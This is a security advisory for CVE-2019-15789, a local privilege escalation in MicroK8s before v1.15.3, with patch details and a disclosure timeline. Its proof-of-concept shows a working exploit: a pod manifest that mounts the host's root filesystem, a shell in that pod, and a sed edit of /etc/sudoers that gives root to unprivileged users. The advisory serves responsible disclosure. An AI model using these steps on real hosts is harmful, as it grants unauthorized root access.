MicroK8s prior to v1.15.3 included a privilege escalation vulnerability, allowing a low privilege user to obtain root access to the host. MicroK8s allowed any user with access to the host to deploy a pod to the underlying Kubernetes installation. This allowed an attacker with local access to provision a privileged container and gain root access to the underlying host.

Bandar-e Būshehr Date Released: 10/09/2019
Author: Denis Andzakovic
Project Website: https://microk8s.io/
Affected Software: MicroK8s <= v1.15.2
CVE: CVE-2019-15789

PROOF-OF-CONCEPT EXPLOIT

As low privileged users were allowed to configure the running cluster and containers therein, a malicious user could spawn a pod with complete access to the root file system, edit /etc/sudoers and escalate to root.

doi@microk8:~$ cat pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: hostmount
spec:
  containers:
  - name: shell
    image: ubuntu:latest
    command:
      - "bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /opt/root
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory
doi@microk8:~$ microk8s.kubectl apply -f pod.yaml
pod/hostmount created
doi@microk8:~$ microk8s.kubectl exec -it hostmount /bin/bash
root@hostmount:/# cd /opt/
root@hostmount:/opt# cd root/
root@hostmount:/opt/root# ls
bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  srv       sys  usr  vmlinuz
boot  etc  initrd.img  lib             lost+found  mnt    proc  run   snap  swap.img  tmp  var  vmlinuz.old
root@hostmount:/opt/root# cd etc/
root@hostmount:/opt/root/etc# sed -i 's/ALL$/NOPASSWD: ALL/g' sudoers
root@hostmount:/opt/root/etc# cat sudoers
{...snip...}
# User privilege specification
root    ALL=(ALL:ALL) NOPASSWD: ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) NOPASSWD: ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) NOPASSWD: ALL
{...snip...}
root@hostmount:/opt/root/etc# exit
exit
doi@microk8:~$ sudo su -
root@microk8:~# id
uid=0(root) gid=0(root) groups=0(root)

The above could also be trivially achieved with a privileged container, though MicroK8s disables privileged containers by default. Note: privileged containers are enabled when Istio is installed.

PATCH

The MicroK8s team addressed this vulnerability in v1.15.3 by requiring any access to the Kubernetes installation to be performed by a privileged user (eg, through sudo or by adding the user to the microk8s group).

TIMELINE

12/06/2019 – Advisory sent to Ubuntu security mailing list.
14/06/2019 – Advisory receipt acknowledged.
16/07/2019 – Update requested.
17/07/2019 – Report confirmed by the Ubuntu team.
15/08/2019 – Update requested.
15/08/2019 – Ubuntu referenced an open pull request, introducing the a requirement for all MicroK8s actions to be performed via sudo.
06/09/2019 – v1.15.3 snap added to stable.
10/09/2019 – Advisory released.